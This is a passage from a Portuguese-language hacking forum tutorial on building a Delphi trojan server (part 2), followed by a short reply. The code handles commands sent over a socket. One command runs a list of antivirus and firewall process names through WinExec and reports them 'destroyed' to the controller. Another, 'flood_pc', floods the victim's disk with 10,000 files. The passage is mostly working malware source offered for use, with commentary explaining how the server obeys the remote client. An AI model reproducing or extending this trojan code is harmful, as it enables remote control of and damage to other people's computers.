WinExec('gbpoll.exe',1);
WinExec('iamapp.exe',1);
WinExec('iamserv.exe',1);
WinExec('lockdown2000.exe',1);
WinExec('navapsvc',1);
WinExec('navapsvc.exe',1);
WinExec('netstat.exe',1);
WinExec('notstart.exe',1);
WinExec('npscheck.exe',1);
WinExec('ntrtscan.EXE',1);
WinExec('nvapsvc',1);
WinExec('pathping.exe',1);
WinExec('pavproxy.exe',1);
WinExec('pccntmon.EXE',1);
WinExec('pccwin97.EXE',1);
WinExec('pcscan.EXE',1);
WinExec('ping.exe',1);
WinExec('rapapp.exe',1);
WinExec('route.exe',1);
WinExec('routemon.exe',1);
WinExec('sbserv.exe',1);
WinExec('sharedaccess',1);
WinExec('tracerpt.exe',1);
WinExec('tracert.exe',1);
WinExec('vbcmserv.exe',1);
WinExec('vsmon.exe',1);
WinExec('zapro.exe',1);
WinExec('zonealarm.exe',1);
socket.SendText('Anti Virus e Firewall Destruidos');
except
socket.SendText('Não Foi possivel acabar com os Anti-Virus e Firewall');
end;
exit;
end;

MessageBox(handle,Pchar(Conective),'Mensagem Recebida', mb_ok + mb_iconinformation);
end;

end.

Agora vou explicar como o Server vai funcionar para isso vou usar um exemplo acima...

{Flood}

if Conective = 'flood_pc' then // Esse é o comando que o Cliente usando o ServerSocket vai enviar para o Server ClientSock
begin
try // Vai ficar tentando até conseguir...
For I := 1 To 10000 do
CreateFile(PChar('Testing ' + IntToStr(i)),0,0,0,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,0); // Comando do Flood
socket.SendText('Flood Realizado'); // Aqui no caso se tudo der certo vai aparecer uma Mensagem la no Cliente com essa informação
except // Se Não der
socket.SendText('Não Foi possivel realizar flood'); // Informação de erro
end;
exit;
end;

Server

Abraços a todos e qualquer duvida podem postar aqui

colt7r · 06 de Setembro , 2007, 04:46:18 PM

Vou rippar seu trojan e vende-lo na rua. Parabens, muito bom. Digno de um Van google.

FORUM DARKERS

Criando um Trojan ~ Com alguns adicionais Parte 2

Anonymous

colt7r